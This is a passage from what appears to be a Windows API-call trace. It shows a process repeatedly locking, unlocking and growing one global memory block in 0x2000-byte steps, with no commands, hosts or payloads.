[0107.343] GlobalLock (hMem=0x58000c) returned 0x126810
[0107.344] GlobalHandle (pMem=0x126810) returned 0x58000c
[0107.344] GlobalUnlock (hMem=0x58000c) returned 0
[0107.344] GlobalReAlloc (hMem=0x58000c, dwBytes=0x3a000, uFlags=0x2) returned 0x58000c
[0107.344] GlobalLock (hMem=0x58000c) returned 0x126810
[0107.344] GlobalHandle (pMem=0x126810) returned 0x58000c
[0107.344] GlobalUnlock (hMem=0x58000c) returned 0
[0107.344] GlobalReAlloc (hMem=0x58000c, dwBytes=0x3c000, uFlags=0x2) returned 0x58000c
[0107.344] GlobalLock (hMem=0x58000c) returned 0x126810
[0107.345] GlobalHandle (pMem=0x126810) returned 0x58000c
[0107.345] GlobalUnlock (hMem=0x58000c) returned 0
[0107.345] GlobalReAlloc (hMem=0x58000c, dwBytes=0x3e000, uFlags=0x2) returned 0x58000c
[0107.345] GlobalLock (hMem=0x58000c) returned 0x126810
[0107.345] GlobalHandle (pMem=0x126810) returned 0x58000c
[0107.345] GlobalUnlock (hMem=0x58000c) returned 0
[0107.345] GlobalReAlloc (hMem=0x58000c, dwBytes=0x40000, uFlags=0x2) returned 0x58000c
[0107.345] GlobalLock (hMem=0x58000c) returned 0x126810
[0107.346] GlobalHandle (pMem=0x126810) returned 0x58000c
[0107.346] GlobalUnlock (hMem=0x58000c) returned 0
[0107.346] GlobalReAlloc (hMem=0x58000c, dwBytes=0x42000, uFlags=0x2) returned 0x58000c
[0107.346] GlobalLock (hMem=0x58000c) returned 0x126810
[0107.346] GlobalHandle (pMem=0x126810) returned 0x58000c
[0107.346] GlobalUnlock (hMem=0x58000c) returned 0
[0107.346] GlobalReAlloc (hMem=0x58000c, dwBytes=0x44000, uFlags=0x2) returned 0x58000c
[0107.346] GlobalLock (hMem=0x58000c) returned 0x126810
[0107.347] GlobalHandle (pMem=0x126810) returned 0x58000c
[0107.347] GlobalUnlock (hMem=0x58000c) returned 0
[0107.347] GlobalReAlloc (hMem=0x58000c, dwBytes=0x46000, uFlags=0x2) returned 0x58000c
[0107.347] GlobalLock (hMem=0x58000c) returned 0x126810
[0107.347] GlobalHandle (pMem=0x126810) returned 0x58000c
[0107.347] GlobalUnlock (hMem=0x58000c) returned 0
[0107.347] GlobalReAlloc (hMem=0x58000c, dwBytes=0x48000, uFlags=0x2) returned 0x58000c
[0107.347] GlobalLock (hMem=0x58000c) returned 0x126810
[0107.348] GlobalHandle (pMem=0x126810) returned 0x58000c
[0107.348] GlobalUnlock (hMem=0x58000c) returned 0
[0107.348] GlobalReAlloc (hMem=0x58000c, dwBytes=0x4a000, uFlags=0x2) returned 0x58000c
[0107.348] GlobalLock (hMem=0x58000c) returned 0x126810
[0107.348] GlobalHandle (pMem=0x126810) returned 0x58000c
[0107.348] GlobalUnlock (hMem=0x58000c) returned 0
[0107.348] GlobalReAlloc (hMem=0x58000c, dwBytes=0x4c000, uFlags=0x2) returned 0x58000c
[0107.348] GlobalLock (hMem=0x58000c) returned 0x126810
[0107.349] GlobalHandle (pMem=0x126810) returned 0x58000c
[0107.349] GlobalUnlock (hMem=0x58000c) returned 0
[0107.349] GlobalReAlloc (hMem=0x58000c, dwBytes=0x4e000, uFlags=0x2) returned 0x58000c
[0107.349] GlobalLock (hMem=0x58000c) returned 0x126810
[0107.349] GlobalHandle (pMem=0x126810) returned 0x58000c
[0107.349] GlobalUnlock (hMem=0x58000c) returned 0
[0107.349] GlobalReAlloc (hMem=0x58000c, dwBytes=0x50000, uFlags=0x2) returned 0x58000c
[0107.349] GlobalLock (hMem=0x58000c) returned 0x126810
[0107.350] GlobalHandle (pMem=0x126810) returned 0x58000c
[0107.350] GlobalUnlock (hMem=0x58000c) returned 0
[0107.350] GlobalReAlloc (hMem=0x58000c, dwBytes=0x52000, uFlags=0x2) returned 0x58000c
[0107.350] GlobalLock (hMem=0x58000c) returned 0x126810
[0107.350] GlobalHandle (pMem=0x126810) returned 0x58000c
[0107.350] GlobalUnlock (hMem=0x58000c) returned 0
[0107.350] GlobalReAlloc (hMem=0x58000c, dwBytes=0x54000, uFlags=0x2) returned 0x58000c
[0107.350] GlobalLock (hMem=0x58000c) returned 0x126810
[0107.351] GlobalHandle (pMem=0x126810) returned 0x58000c
[0107.351] GlobalUnlock (hMem=0x58000c) returned 0
[0107.351] GlobalReAlloc (hMem=0x58000c, dwBytes=0x56000, uFlags=0x2) returned 0x58000c
[0107.351] GlobalLock (hMem=0x58000c) returned 0x126810
[0107.351] GlobalHandle (pMem=0x126810) returned 0x58000c
[0107.351] GlobalUnlock (hMem=0x58000c) returned 0
[0107.351] GlobalReAlloc (hMem=0x58000c, dwBytes=0x58000, uFlags=0x2) returned 0x58000c
[0107.351] GlobalLock (hMem=0x58000c) returned 0x126810
[0107.352] GlobalHandle (pMem=0x126810) returned 0x58000c
[0107.352] GlobalUnlock (hMem=0x58000c) returned 0
[0107.352] GlobalReAlloc (hMem=0x58000c, dwBytes=0x5a000, uFlags=0x2) returned 0x58000c
[0107.352] GlobalLock (hMem=0x58000c) returned 0x126810
[0107.400] GlobalHandle (pMem=0x126810) returned 0x58000c
[0107.400] GlobalUnlock (hMem=0x58000c) returned 0
[0107.400] GlobalReAlloc (hMem=0x58000c, dwBytes=0x5c000, uFlags=0x2) returned 0x58000c
[0107.400] GlobalLock (hMem=0x58000c) returned 0x126810
[0107.400] GlobalHandle (pMem=0x126810) returned 0x58000c
[0107.400] GlobalUnlock (hMem=0x58000c) returned 0
[0107.400] GlobalReAlloc (hMem=0x58000c, dwBytes=0x5e000, uFlags=0x2) returned 0x58000c
[0107.400] GlobalLock (hMem=0x58000c) returned 0x126810
[0107.401] GlobalHandle (pMem=0x126810) returned 0x58000c
[0107.401] GlobalUnlock (hMem=0x58000c) returned 0
[0107.401] GlobalReAlloc (hMem=0x58000c, dwBytes=0x60000, uFlags=0x2) returned 0x58000c
[0107.401] GlobalLock (hMem=0x58000c) returned 0x126810
[0107.401] GlobalHandle (pMem=0x126810) returned 0x58000c
[0107.401] GlobalUnlock (hMem=0x58000c) returned 0
[0107.401] GlobalReAlloc (hMem=0x58000c, dwBytes=0x62000, uFlags=0x2) returned 0x58000c
[0107.401] GlobalLock (hMem=0x58000c) returned 0x126810
[0107.402] GlobalHandle (pMem=0x126810) returned 0x58000c
[0107.402] GlobalUnlock (hMem=0x58000c) returned 0
[0107.402] GlobalReAlloc (hMem=0x58000c, dwBytes=0x64000, uFlags=0x2) returned 0x58000c
[0107.402] GlobalLock (hMem=0x58000c) returned 0x126810
[0107.402] GlobalHandle (pMem=0x126810) returned 0x58000c
[0107.402] GlobalUnlock (hMem=0x58000c) returned 0
[0107.402] GlobalReAlloc (hMem=0x58000c, dwBytes=0x66000, uFlags=0x2) returned 0x58000c
[0107.402] GlobalLock (hMem=0x58000c) returned 0x126810
[0107.403] GlobalHandle (pMem=0x126810) returned 0x58000c
[0107.403] GlobalUnlock (hMem=0x58000c) returned 0
[0107.403] GlobalReAlloc (hMem=0x58000c, dwBytes=0x68000, uFlags=0x2) returned 0x58000c
[0107.403] GlobalLock (hMem=0x58000c) returned 0x126810
[0107.403] GlobalHandle (pMem=0x126810) returned 0x58000c
[0107.403] GlobalUnlock (hMem=0x58000c) returned 0
[0107.403] GlobalReAlloc (hMem=0x58000c, dwBytes=0x6a000, uFlags=0x2) returned 0x58000c
[0107.403] GlobalLock (hMem=0x58000c) returned 0x126810
[0107.404] GlobalHandle (pMem=0x126810) returned 0x58000c
[0107.404] GlobalUnlock (hMem=0x58000c) returned 0
[0107.404] GlobalReAlloc (hMem=0x58000c, dwBytes=0x6c000, uFlags=0x2) returned 0x58000c
[0107.410] GlobalLock (hMem=0x58000c) returned 0x190820
[0107.410] GlobalHandle (pMem=0x190820) returned 0x58000c
[0107.410] GlobalUnlock (hMem=0x58000c) returned 0
[0107.410] GlobalReAlloc (hMem=0x58000c, dwBytes=0x6e000, uFlags=0x2) returned 0x58000c
[0107.410] GlobalLock (hMem=0x58000c) returned 0x190820
[0107.411] GlobalHandle (pMem=0x190820) returned 0x58000c
[0107.411] GlobalUnlock (hMem=0x58000c) returned 0
[0107.411] GlobalReAlloc (hMem=0x58000c, dwBytes=0x70000, uFlags=0x2) returned 0x58000c
[0107.424] GlobalLock (hMem=0x58000c) returned 0xd50048
[0107.425] GlobalHandle (pMem=0xd50048) returned 0x58000c
[0107.425] GlobalUnlock (hMem=0x58000c) returned 0
[0107.425] GlobalReAlloc (hMem=0x58000c, dwBytes=0x72000, uFlags=0x2) returned 0x58000c
[0107.431] GlobalLock (hMem=0x58000c) returned 0xdc0058
[0107.432] GlobalHandle (pMem=0xdc0058) returned 0x58000c
[0107.432] GlobalUnlock (hMem=0x58000c) returned 0
[0107.432] GlobalReAlloc (hMem=0x58000c, dwBytes=0x74000, uFlags=0x2) returned 0x58000c
[0107.432] GlobalLock (hMem=0x58000c) returned 0xdc0058
[0107.432] GlobalHandle (pMem=0xdc0058) returned 0x58000c
[0107.432] GlobalUnlock (hMem=0x58000c) returned 0
[0107.433] GlobalReAlloc (hMem=0x58000c, dwBytes=0x76000, uFlags=0x2) returned 0x58000c
[0107.495] GlobalLock (hMem=0x58000c) returned 0x126810
[0107.495] GlobalHandle (pMem=0x126810) returned 0x58000c
[0107.495] GlobalUnlock (hMem=0x58000c) returned 0
[0107.495] GlobalReAlloc (hMem=0x58000c, dwBytes=0x78000, uFlags=0x2) returned 0x58000c
[0107.503] GlobalLock (hMem=0x58000c) returned 0xd50048
[0107.504] GlobalHandle (pMem=0xd50048) returned 0x58000c
[0107.504] GlobalUnlock (hMem=0x58000c) returned 0
[0107.504] GlobalReAlloc (hMem=0x58000c, dwBytes=0x7a000, uFlags=0x2) returned 0x58000c
[0107.512] GlobalLock (hMem=0x58000c) returned 0xdc8058
[0107.513] GlobalHandle (pMem=0xdc8058) returned 0x58000c
[0107.513] GlobalUnlock (hMem=0x58000c) returned 0
[0107.513] GlobalReAlloc (hMem=0x58000c, dwBytes=0x7c000, uFlags=0x2) returned 0x58000c
[0107.513] GlobalLock (hMem=0x58000c) returned 0xdc8058
[0107.514] GlobalHandle (pMem=0xdc8058) returned 0x58000c
[0107.514] GlobalUnlock (hMem=0x58000c) returned 0
[0107.514] GlobalReAlloc (hMem=0x58000c, dwBytes=0x7e000, uFlags=0x2) returned 0x58000c
[0107.528] GlobalLock (hMem=0x58000c) returned 0x2520048
[0107.529] GlobalHandle (pMem=0x2520048) returned 0x58000c
[0107.529] GlobalUnlock (hMem=0x58000c) returned 0
[0107.529] GlobalReAlloc (hMem=0x58000c, dwBytes=0x80000, uFlags=0x2) returned 0x58000c
[0107.578] GlobalLock (hMem=0x58000c) returned 0xe50020
[0107.579] GlobalHandle (pMem=0xe50020) returned 0x58000c
[0107.579] GlobalUnlock (hMem=0x58000c) returned 0
[0107.579] GlobalReAlloc (hMem=0x58000c, dwBytes=0x82000, uFlags=0x2) returned 0x58000c
[0107.590] GlobalLock (hMem=0x58000c) returned 0xee0020
[0107.590] GlobalHandle (pMem=0xee0020) returned 0x58000c
[0107.591] GlobalUnlock (hMem=0x58000c) returned 0
[0107.591] GlobalReAlloc (hMem=0x58000c, dwBytes=0x84000, uFlags=0x2) returned 0x58000c
[0107.601] GlobalLock (hMem=0x58000c) returned 0xe50020
[0107.603] GlobalHandle (pMem=0xe50020) returned 0x58000c
[0107.603] GlobalUnlock (hMem=0x58000c) returned 0
[0107.603] GlobalReAlloc (hMem=0x58000c, dwBytes=0x86000, uFlags=0x2) returned 0x58000c
[0107.614] GlobalLock (hMem=0x58000c) returned 0xee0020
[0107.615] GlobalHandle (pMem=0xee0020) returned 0x58000c
[0107.615] GlobalUnlock (hMem=0x58000c) returned 0
[0107.615] GlobalReAlloc (hMem=0x58000c, dwBytes=0x88000, uFlags=0x2) returned 0x58000c
[0107.673] GlobalLock (hMem=0x58000c) returned 0xe50020
[0107.674] GlobalHandle (pMem=0xe50020) returned 0x58000c
[0107.674] GlobalUnlock (hMem=0x58000c) returned 0
[0107.674] GlobalReAlloc (hMem=0x58000c, dwBytes=0x8a000, uFlags=0x2) returned 0x58000c
[0107.685] GlobalLock (hMem=0x58000c) returned 0xee0020
[0107.686] GlobalHandle (pMem=0xee0020) returned 0x58000c
[0107.686] GlobalUnlock (hMem=0x58000c) returned 0
[0107.686] GlobalReAlloc (hMem=0x58000c, dwBytes=0x8c000, uFlags=0x2) returned 0x58000c
[0107.698] GlobalLock (hMem=0x58000c) returned 0xe50020
[0107.699] GlobalHandle (pMem=0xe50020) returned 0x58000c
[0107.699] GlobalUnlock (hMem=0x58000c) returned 0
[0107.699] GlobalReAlloc (hMem=0x58000c, dwBytes=0x8e000, uFlags=0x2) returned 0x58000c
[0107.710] GlobalLock (hMem=0x58000c) returned 0xee0020
[0107.711] GlobalHandle (pMem=0xee0020) returned 0x58000c
[0107.711] GlobalUnlock (hMem=0x58000c) returned 0
[0107.711] GlobalReAlloc (hMem=0x58000c, dwBytes=0x90000, uFlags=0x2) returned 0x58000c
[0107.770] GlobalLock (hMem=0x58000c) returned 0x2720020
[0107.771] GlobalHandle (pMem=0x2720020) returned 0x58000c
[0107.771] GlobalUnlock (hMem=0x58000c) returned 0
[0107.771] GlobalReAlloc (hMem=0x58000c, dwBytes=0x92000, uFlags=0x2) returned 0x58000c
[0107.783] GlobalLock (hMem=0x58000c) returned 0xe50020
[0107.784] GlobalHandle (pMem=0xe50020) returned 0x58000c
[0107.784] GlobalUnlock (hMem=0x58000c) returned 0
[0107.784] GlobalReAlloc (hMem=0x58000c, dwBytes=0x94000, uFlags=0x2) returned 0x58000c
[0107.796] GlobalLock (hMem=0x58000c) returned 0xef0020
[0107.797] GlobalHandle (pMem=0xef0020) returned 0x58000c
[0107.797] GlobalUnlock (hMem=0x58000c) returned 0
[0107.797] GlobalReAlloc (hMem=0x58000c, dwBytes=0x96000, uFlags=0x2) returned 0x58000c
[0107.857] GlobalLock (hMem=0x58000c) returned 0xe50020
[0107.858] GlobalHandle (pMem=0xe50020) returned 0x58000c
[0107.858] GlobalUnlock (hMem=0x58000c) returned 0
[0107.858] GlobalReAlloc (hMem=0x58000c, dwBytes=0x98000, uFlags=0x2) returned 0x58000c
[0107.871] GlobalLock (hMem=0x58000c) returned 0xef0020
[0107.872] GlobalHandle (pMem=0xef0020) returned 0x58000c
[0107.872] GlobalUnlock (hMem=0x58000c) returned 0
[0107.872] GlobalReAlloc (hMem=0x58000c, dwBytes=0x9a000, uFlags=0x2) returned 0x58000c
[0107.884] GlobalLock (hMem=0x58000c) returned 0xe50020
[0107.885] GlobalHandle (pMem=0xe50020) returned 0x58000c
[0107.885] GlobalUnlock (hMem=0x58000c) returned 0
[0107.885] GlobalReAlloc (hMem=0x58000c, dwBytes=0x9c000, uFlags=0x2) returned 0x58000c
[0107.948] GlobalLock (hMem=0x58000c) returned 0xef0020
[0107.949] GlobalHandle (pMem=0xef0020) returned 0x58000c
[0107.949] GlobalUnlock (hMem=0x58000c) returned 0
[0107.949] GlobalReAlloc (hMem=0x58000c, dwBytes=0x9e000, uFlags=0x2) returned 0x58000c
[0107.962] GlobalLock (hMem=0x58000c) returned 0xe50020
[0107.963] GlobalHandle (pMem=0xe50020) returned 0x58000c
[0107.963] GlobalUnlock (hMem=0x58000c) returned 0
[0107.963] GlobalReAlloc (hMem=0x58000c, dwBytes=0xa0000, uFlags=0x2) returned 0x58000c
[0107.983] GlobalLock (hMem=0x58000c) returned 0xef0020
[0107.984] GlobalHandle (pMem=0xef0020) returned 0x58000c
[0107.984] GlobalUnlock (hMem=0x58000c) returned 0
[0107.984] GlobalReAlloc (hMem=0x58000c, dwBytes=0xa2000, uFlags=0x2) returned 0x58000c
[0108.049] GlobalLock (hMem=0x58000c) returned 0x2720020
[0108.049] GlobalHandle (pMem=0x2720020) returned 0x58000c
[0108.049] GlobalUnlock (hMem=0x58000c) returned 0
[0108.049] GlobalReAlloc (hMem=0x58000c, dwBytes=0xa4000, uFlags=0x2) returned 0x58000c
[0108.063] GlobalLock (hMem=0x58000c) returned 0xe50020
[0108.064] GlobalHandle (pMem=0xe50020) returned 0x58000c
[0108.064] GlobalUnlock (hMem=0x58000c) returned 0
[0108.064] GlobalReAlloc (hMem=0x58000c, dwBytes=0xa6000, uFlags=0x2) returned 0x58000c
[0108.077] GlobalLock (hMem=0x58000c) returned 0xf00020
[0108.078] GlobalHandle (pMem=0xf00020) returned 0x58000c
[0108.078] GlobalUnlock (hMem=0x58000c) returned 0
[0108.078] GlobalReAlloc (hMem=0x58000c, dwBytes=0xa8000, uFlags=0x2) returned 0x58000c
[0108.139] GlobalLock (hMem=0x58000c) returned 0xe50020
[0108.139] GlobalHandle (pMem=0xe50020) returned 0x58000c
[0108.140] GlobalUnlock (hMem=0x58000c) returned 0
[0108.140] GlobalReAlloc (hMem=0x58000c, dwBytes=0xaa000, uFlags=0x2) returned 0x58000c
[0108.154] GlobalLock (hMem=0x58000c) returned 0xf00020
[0108.155] GlobalHandle (pMem=0xf00020) returned 0x58000c
[0108.155] GlobalUnlock (hMem=0x58000c) returned 0
[0108.155] GlobalReAlloc (hMem=0x58000c, dwBytes=0xac000, uFlags=0x2) returned 0x58000c
[0108.169] GlobalLock (hMem=0x58000c) returned 0xe50020
[0108.170] GlobalHandle (pMem=0xe50020) returned 0x58000c
[0108.170] GlobalUnlock (hMem=0x58000c) returned 0
[0108.170] GlobalReAlloc (hMem=0x58000c, dwBytes=0xae000, uFlags=0x2) returned 0x58000c
[0108.241] GlobalLock (hMem=0x58000c) returned 0xf00020
[0108.242] GlobalHandle (pMem=0xf00020) returned 0x58000c
[0108.242] GlobalUnlock (hMem=0x58000c) returned 0
[0108.242] GlobalReAlloc (hMem=0x58000c, dwBytes=0xb0000, uFlags=0x2) returned 0x58000c
[0108.262] GlobalLock (hMem=0x58000c) returned 0x2720020
[0108.263] GlobalHandle (pMem=0x2720020) returned 0x58000c
[0108.263] GlobalUnlock (hMem=0x58000c) returned 0
[0108.263] GlobalReAlloc (hMem=0x58000c, dwBytes=0xb2000, uFlags=0x2) returned 0x58000c
[0108.325] GlobalLock (hMem=0x58000c) returned 0xe50020
[0108.325] GlobalHandle (pMem=0xe50020) returned 0x58000c
[0108.325] GlobalUnlock (hMem=0x58000c) returned 0
[0108.325] GlobalReAlloc (hMem=0x58000c, dwBytes=0xb4000, uFlags=0x2) returned 0x58000c
[0108.340] GlobalLock (hMem=0x58000c) returned 0xf10020
[0108.341] GlobalHandle (pMem=0xf10020) returned 0x58000c
[0108.341] GlobalUnlock (hMem=0x58000c) returned 0
[0108.341] GlobalReAlloc (hMem=0x58000c, dwBytes=0xb6000, uFlags=0x2) returned 0x58000c
[0108.357] GlobalLock (hMem=0x58000c) returned 0xe50020
[0108.358] GlobalHandle (pMem=0xe50020) returned 0x58000c
[0108.358] GlobalUnlock (hMem=0x58000c) returned 0
[0108.358] GlobalReAlloc (hMem=0x58000c, dwBytes=0xb8000, uFlags=0x2) returned 0x58000c
[0108.420] GlobalLock (hMem=0x58000c) returned 0xf10020
[0108.421] GlobalHandle (pMem=0xf10020) returned 0x58000c
[0108.421] GlobalUnlock (hMem=0x58000c) returned 0
[0108.421] GlobalReAlloc (hMem=0x58000c, dwBytes=0xba000, uFlags=0x2) returned 0x58000c
[0108.436] GlobalLock (hMem=0x58000c) returned 0xe50020
[0108.436] GlobalHandle (pMem=0xe50020) returned 0x58000c
[0108.436] GlobalUnlock (hMem=0x58000c) returned 0
[0108.437] GlobalReAlloc (hMem=0x58000c, dwBytes=0xbc000, uFlags=0x2) returned 0x58000c
[0108.453] GlobalLock (hMem=0x58000c) returned 0xf10020
[0108.453] GlobalHandle (pMem=0xf10020) returned 0x58000c
[0108.454] GlobalUnlock (hMem=0x58000c) returned 0
[0108.454] GlobalReAlloc (hMem=0x58000c, dwBytes=0xbe000, uFlags=0x2) returned 0x58000c
[0108.517] GlobalLock (hMem=0x58000c) returned 0xe50020
[0108.518] GlobalHandle (pMem=0xe50020) returned 0x58000c
[0108.518] GlobalUnlock (hMem=0x58000c) returned 0
[0108.518] GlobalReAlloc (hMem=0x58000c, dwBytes=0xc0000, uFlags=0x2) returned 0x58000c
[0108.534] GlobalLock (hMem=0x58000c) returned 0xf10020
[0108.535] GlobalHandle (pMem=0xf10020) returned 0x58000c
[0108.535] GlobalUnlock (hMem=0x58000c) returned 0
[0108.535] GlobalReAlloc (hMem=0x58000c, dwBytes=0xc2000, uFlags=0x2) returned 0x58000c
[0108.550] GlobalLock (hMem=0x58000c) returned 0x2720020
[0108.551] GlobalHandle (pMem=0x2720020) returned 0x58000c
[0108.551] GlobalUnlock (hMem=0x58000c) returned 0
[0108.551] GlobalReAlloc (hMem=0x58000c, dwBytes=0xc4000, uFlags=0x2) returned 0x58000c
[0108.615] GlobalLock (hMem=0x58000c) returned 0xe50020
[0108.617] GlobalHandle (pMem=0xe50020) returned 0x58000c
[0108.617] GlobalUnlock (hMem=0x58000c) returned 0
[0108.617] GlobalReAlloc (hMem=0x58000c, dwBytes=0xc6000, uFlags=0x2) returned 0x58000c
[0108.634] GlobalLock (hMem=0x58000c) returned 0x2720020
[0108.635] GlobalHandle (pMem=0x2720020) returned 0x58000c
[0108.635] GlobalUnlock (hMem=0x58000c) returned 0
[0108.635] GlobalReAlloc (hMem=0x58000c, dwBytes=0xc8000, uFlags=0x2) returned 0x58000c
[0108.701] GlobalLock (hMem=0x58000c) returned 0xe50020
[0108.702] GlobalHandle (pMem=0xe50020) returned 0x58000c
[0108.702] GlobalUnlock (hMem=0x58000c) returned 0
[0108.702] GlobalReAlloc (hMem=0x58000c, dwBytes=0xca000, uFlags=0x2) returned 0x58000c
[0108.722] GlobalLock (hMem=0x58000c) returned 0x2720020
[0108.723] GlobalHandle (pMem=0x2720020) returned 0x58000c
[0108.723] GlobalUnlock (hMem=0x58000c) returned 0
[0108.723] GlobalReAlloc (hMem=0x58000c, dwBytes=0xcc000, uFlags=0x2) returned 0x58000c
[0108.792] GlobalLock (hMem=0x58000c) returned 0xe50020
[0108.793] GlobalHandle (pMem=0xe50020) returned 0x58000c
[0108.793] GlobalUnlock (hMem=0x58000c) returned 0
[0108.793] GlobalReAlloc (hMem=0x58000c, dwBytes=0xce000, uFlags=0x2) returned 0x58000c
[0108.813] GlobalLock (hMem=0x58000c) returned 0x2720020
[0108.814] GlobalHandle (pMem=0x2720020) returned 0x58000c
[0108.814] GlobalUnlock (hMem=0x58000c) returned 0
[0108.814] GlobalReAlloc (hMem=0x58000c, dwBytes=0xd0000, uFlags=0x2) returned 0x58000c
[0108.900] GlobalLock (hMem=0x58000c) returned 0xe50020
[0108.901] GlobalHandle (pMem=0xe50020) returned 0x58000c
[0108.901] GlobalUnlock (hMem=0x58000c) returned 0
[0108.901] GlobalReAlloc (hMem=0x58000c, dwBytes=0xd2000, uFlags=0x2) returned 0x58000c
[0108.919] GlobalLock (hMem=0x58000c) returned 0x2720020
[0108.920] GlobalHandle (pMem=0x2720020) returned 0x58000c
[0108.920] GlobalUnlock (hMem=0x58000c) returned 0
[0108.920] GlobalReAlloc (hMem=0x58000c, dwBytes=0xd4000, uFlags=0x2) returned 0x58000c
[0108.937] GlobalLock (hMem=0x58000c) returned 0xe50020
[0108.938] GlobalHandle (pMem=0xe50020) returned 0x58000c
[0108.938] GlobalUnlock (hMem=0x58000c) returned 0
[0108.938] GlobalReAlloc (hMem=0x58000c, dwBytes=0xd6000, uFlags=0x2) returned 0x58000c
[0109.013] GlobalLock (hMem=0x58000c) returned 0x2720020
[0109.013] GlobalHandle (pMem=0x2720020) returned 0x58000c
[0109.013] GlobalUnlock (hMem=0x58000c) returned 0
[0109.013] GlobalReAlloc (hMem=0x58000c, dwBytes=0xd8000, uFlags=0x2) returned 0x58000c
[0109.034] GlobalLock (hMem=0x58000c) returned 0xe50020
[0109.035] GlobalHandle (pMem=0xe50020) returned 0x58000c
[0109.035] GlobalUnlock (hMem=0x58000c) returned 0
[0109.035] GlobalReAlloc (hMem=0x58000c, dwBytes=0xda000, uFlags=0x2) returned 0x58000c
[0109.102] GlobalLock (hMem=0x58000c) returned 0x2720020
[0109.103] GlobalHandle (pMem=0x2720020) returned 0x58000c
[0109.103] GlobalUnlock (hMem=0x58000c) returned 0
[0109.103] GlobalReAlloc (hMem=0x58000c, dwBytes=0xdc000, uFlags=0x2) returned 0x58000c
[0109.121] GlobalLock (hMem=0x58000c) returned 0xe50020
[0109.122] GlobalHandle (pMem=0xe50020) returned 0x58000c
[0109.122] GlobalUnlock (hMem=0x58000c) returned 0
[0109.122] GlobalReAlloc (hMem=0x58000c, dwBytes=0xde000, uFlags=0x2) returned 0x58000c
[0109.188] GlobalLock (hMem=0x58000c) returned 0x2720020
[0109.189] GlobalHandle (pMem=0x2720020) returned 0x58000c
[0109.189] GlobalUnlock (hMem=0x58000c) returned 0
[0109.189] GlobalReAlloc (hMem=0x58000c, dwBytes=0xe0000, uFlags=0x2) returned 0x58000c
[0109.207] GlobalLock (hMem=0x58000c) returned 0xe50020
[0109.208] GlobalHandle (pMem=0xe50020) returned 0x58000c
[0109.208] GlobalUnlock (hMem=0x58000c) returned 0
[0109.208] GlobalReAlloc (hMem=0x58000c, dwBytes=0xe2000, uFlags=0x2) returned 0x58000c
[0109.273] GlobalLock (hMem=0x58000c) returned 0x2720020
[0109.274] GlobalHandle (pMem=0x2720020) returned 0x58000c
[0109.274] GlobalUnlock (hMem=0x58000c) returned 0
[0109.274] GlobalReAlloc (hMem=0x58000c, dwBytes=0xe4000, uFlags=0x2) returned 0x58000c
[0109.293] GlobalLock (hMem=0x58000c) returned 0xe50020
[0109.294] GlobalHandle (pMem=0xe50020) returned 0x58000c
[0109.294] GlobalUnlock (hMem=0x58000c) returned 0
[0109.294] GlobalReAlloc (hMem=0x58000c, dwBytes=0xe6000, uFlags=0x2) returned 0x58000c
[0109.366] GlobalLock (hMem=0x58000c) returned 0x2720020
[0109.367] GlobalHandle (pMem=0x2720020) returned 0x58000c
[0109.367] GlobalUnlock (hMem=0x58000c) returned 0
[0109.367] GlobalReAlloc (hMem=0x58000c, dwBytes=0xe8000, uFlags=0x2) returned 0x58000c
[0109.386] GlobalLock (hMem=0x58000c) returned 0xe50020
[0109.387] GlobalHandle (pMem=0xe50020) returned 0x58000c
[0109.387] GlobalUnlock (hMem=0x58000c) returned 0
[0109.387] GlobalReAlloc (hMem=0x58000c, dwBytes=0xea000, uFlags=0x2) returned 0x58000c
[0109.406] GlobalLock (hMem=0x58000c) returned 0x2720020
[0109.407] GlobalHandle (pMem=0x2720020) returned 0x58000c
[0109.407] GlobalUnlock (hMem=0x58000c) returned 0
[0109.407] GlobalReAlloc (hMem=0x58000c, dwBytes=0xec000, uFlags=0x2) returned 0x58000c
[0109.476] GlobalLock (hMem=0x58000c) returned 0xe50020
[0109.477] GlobalHandle (pMem=0xe50020) returned 0x58000c
[0109.477] GlobalUnlock (hMem=0x58000c) returned 0
[0109.477] GlobalReAlloc (hMem=0x58000c, dwBytes=0xee000, uFlags=0x2) returned 0x58000c
[0109.502] GlobalLock (hMem=0x58000c) returned 0x2720020
[0109.503] GlobalHandle (pMem=0x2720020) returned 0x58000c
[0109.503] GlobalUnlock (hMem=0x58000c) returned 0
[0109.503] GlobalReAlloc (hMem=0x58000c, dwBytes=0xf0000, uFlags=0x2) returned 0x58000c
[0109.575] GlobalLock (hMem=0x58000c) returned 0xe50020
[0109.576] GlobalHandle (pMem=0xe50020) returned 0x58000c
[0109.576] GlobalUnlock (hMem=0x58000c) returned 0
[0109.576] GlobalReAlloc (hMem=0x58000c, dwBytes=0xf2000, uFlags=0x2) returned 0x58000c
[0109.649] GlobalLock (hMem=0x58000c) returned 0x2720020
[0109.650] GlobalHandle (pMem=0x2720020) returned 0x58000c
[0109.650] GlobalUnlock (hMem=0x58000c) returned 0
[0109.650] GlobalReAlloc (hMem=0x58000c, dwBytes=0xf4000, uFlags=0x2) returned 0x58000c
[0109.670] GlobalLock (hMem=0x58000c) returned 0xe50020
[0109.671] GlobalHandle (pMem=0xe50020) returned 0x58000c
[0109.671] GlobalUnlock (hMem=0x58000c) returned 0
[0109.671] GlobalReAlloc (hMem=0x58000c, dwBytes=0xf6000, uFlags=0x2) returned 0x58000c
[0109.691] GlobalLock (hMem=0x58000c) returned 0x2720020
[0109.692] GlobalHandle (pMem=0x2720020) returned 0x58000c
[0109.692] GlobalUnlock (hMem=0x58000c) returned 0
[0109.692] GlobalReAlloc (hMem=0x58000c, dwBytes=0xf8000, uFlags=0x2) returned 0x58000c
[0109.759] GlobalLock (hMem=0x58000c) returned 0xe50020
[0109.760] GlobalHandle (pMem=0xe50020) returned 0x58000c
[0109.760] GlobalUnlock (hMem=0x58000c) returned 0
[0109.760] GlobalReAlloc (hMem=0x58000c, dwBytes=0xfa000, uFlags=0x2) returned 0x58000c
[0109.780] GlobalLock (hMem=0x58000c) returned 0x2720020
[0109.781] GlobalHandle (pMem=0x2720020) returned 0x58000c
[0109.781] GlobalUnlock (hMem=0x58000c) returned 0
[0109.781] GlobalReAlloc (hMem=0x58000c, dwBytes=0xfc000, uFlags=0x2) returned 0x58000c
[0109.849] GlobalLock (hMem=0x58000c) returned 0xe50020
[0109.850] GlobalHandle (pMem=0xe50020) returned 0x58000c
[0109.850] GlobalUnlock (hMem=0x58000c) returned 0
[0109.850] GlobalReAlloc (hMem=0x58000c, dwBytes=0xfe000, uFlags=0x2) returned 0x58000c
[0109.871] GlobalLock (hMem=0x58000c) returned 0x2720020
[0109.872] GlobalHandle (pMem=0x2720020) returned 0x58000c
[0109.872] GlobalUnlock (hMem=0x58000c) returned 0
